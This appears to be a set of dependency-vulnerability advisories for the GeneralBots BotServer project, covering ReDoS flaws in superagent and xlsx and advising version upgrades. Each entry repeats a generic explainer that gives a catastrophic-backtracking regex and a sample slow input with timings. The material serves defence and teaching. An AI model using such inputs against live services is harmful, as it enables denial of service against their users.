This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade superagent to version 3.7.0 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: xlsx
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 j@0.4.3 xlsx@0.7.12

Overview

xlsx is a Parser and writer for various spreadsheet formats.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can cause an impact of about 2 seconds matching time for data 50k characters long. This vulnerability is due to an incomplete fix for SNYK-JS-XLSX-10909.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade xlsx to version 0.16.0 or higher.

References

low severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: xlsx
  • Introduced through: textract@2.5.0

Detailed paths

  • Introduced through: botserver@GeneralBots/BotServer#68ffecd54f0f4eefb0e1d47d5d2871b35eee3783 textract@2.5.0 j@0.4.3 xlsx@0.7.12

Overview

xlsx is a parser and writer for various spreadsheet formats.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks. This can cause an impact of about 10 seconds matching time for data 40k characters long.

Disclosure Timeline

  • Feb 19th, 2018 - Initial Disclosure to package owner
  • Feb 19th, 2018 - Initial Response from package owner
  • Feb 21th, 2018 - Fix issued
  • Feb 22th, 2018 - Vulnerability published

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade xlsx to verson 0.12.2 or higher

References